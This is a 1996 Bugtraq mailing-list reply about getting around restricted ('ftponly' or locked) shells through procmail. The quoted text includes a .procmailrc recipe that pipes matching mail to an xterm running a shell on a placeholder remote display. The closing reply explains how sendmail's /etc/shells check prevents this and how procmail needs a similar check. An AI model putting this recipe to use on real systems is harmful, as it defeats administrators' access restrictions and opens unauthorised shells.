[3079] in bugtraq
Re: procmail
daemon@ATHENA.MIT.EDU (Kari E. Hurtta)
Wed Aug 7 16:48:12 1996
Date: Wed, 7 Aug 1996 08:47:26 +0300
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Kari E. Hurtta" <Kari.Hurtta@dionysos.fmi.fi>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199608062130.WAA25867@server2.mersinet.co.uk> from Neil
Soveran-Charley at "Aug 6, 96 10:30:46 pm"
Neil Soveran-Charley kirjoittaa:
> > hi there ,
> > I just heard from a friend that there is a bug in procmail
> > which allows anyone to open an xterm window from any
> > m/c .has anyone heard of this if so can u post the details
> > and the xploit
> > thanx
> > danny
> >
>
> NB: This isn't a 'hack an account' hole. However if you have
> 'ftponly' accounts, i.e. people grab email via pop, but also have ftp
> access for maintaingin their web pages, with a 'shell' that prints a
> message and exits, then the following is possible to work around such
> security...
>
> I think there may well be such an exploit. I'd guess it is simply
> something like:
>
> (.procmailrc contents)
>
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
>
> (end .procmailrc)
>
> Then email yourself with something with the password in the subject
> line and an xterm gets popped up on the display, running the given
> shell, thus bypassing any 'locked account' or 'ftponly' shells...
>
> I'm sure procmail MUST have some security feature to disallow this
> sort of thing? But I could be wrong, and haven't checked the manual
> pages yet.
Sendmail disallows this short things by not allowing pipes in .forward
if user have not valid shell (listed in /etc/shells). Yes, if you
use procmail as local delivery agent, then you need same kind mechanism
in procmail also (if it allows piping mail to programs).
